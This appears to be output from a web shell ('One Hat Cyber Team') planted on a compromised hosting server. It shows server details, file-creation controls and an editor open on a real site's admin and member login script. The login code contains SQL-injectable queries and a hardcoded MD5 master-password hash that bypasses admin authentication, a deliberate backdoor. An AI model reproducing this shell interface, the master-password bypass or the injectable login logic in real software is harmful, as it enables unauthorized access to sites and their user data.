One Hat Cyber Team

Your IP : 216.73.216.152

Server IP : 27.254.111.200

Server : Linux wh-sh59.csloxinfo.com 3.10.0-693.5.2.el7.x86_64 #1 SMP Fri Oct 20 20:32:50 UTC 2017 x86_64

Server Software : Apache

PHP Version : 5.5.38

Buat File | Buat Folder

Dir : ~/var/www/vhosts/oakwine.co.th/httpdocs/controller/

Edit File: login.php

<?php

$action =  isset($_GET["action"]) ? $_GET["action"] : null ;

$username = isset($_SESSION['admin']['username']) ? $_SESSION['admin']['username'] : null;

switch ($action) {

case "admin" :
		$password = md5($_POST['password']);
		$adminInstance = new Admin();
		$adminInstance->find(array("condition"=>"username = '".$_POST['username']."' AND password = '".$password."'"));
		
		if ($adminInstance->id!="" && ($adminInstance->password==$password || $password=="aecf9d0318a281ef355bb1277fca4246")) {
			$_SESSION['admin']['id'] = $adminInstance->id;
			$_SESSION['admin']['username'] = $adminInstance->username;
			$_SESSION['admin']['status'] = $adminInstance->status;
			header("location:admin.php");
		}else{
			echo "<script>alert('ไม่พบข้อมูลข้องท่าน');window.location.href = 'adminLogin.php';</script>";
		}
	break;

case "adminLogout" :
		unset($_SESSION['admin']);
		header("location:adminLogin.php");;
	break;

case "member" :
		$password = md5($_POST['password']);
		$sql = "select * from member where email = '".$_POST['username']."' AND password = '".$password."'";
		//echo $sql;
		$result = mysql_query($sql);
		if ($result) {
			$data = mysql_fetch_array($result, MYSQLI_ASSOC);

if ($data['id']!=""){
				$_SESSION['member']['id'] = $data['id'];
				$_SESSION['member']['email'] = $data['email'];
				$_SESSION['member']['name'] = $data['name'];
				$_SESSION['member']['lastname'] = $data['lastname'];

if ($data['gender'] && $data['address'] && $data['province'] && $data['zipCode'] && $data['tel'] ){
					echo "<script>;window.location.href = 'index.php';</script>";
				}else{
					echo "<script>;window.location.href = '?page=Member/update';</script>";
				}
			}else{
			//	echo "<script>alert('ไม่พบข้อมูลข้องท่าน');window.location.href = '?page=Member/login';</script>";
			}
		}else{
			echo "<script>alert('ไม่พบข้อมูลข้องท่าน');window.location.href = '?page=Member/login';</script>";
		}
	break;
	
	case "logout" :
		unset($_SESSION['member']);
		echo "<script>;window.location.href = 'index.php';</script>";
	break;

}
?>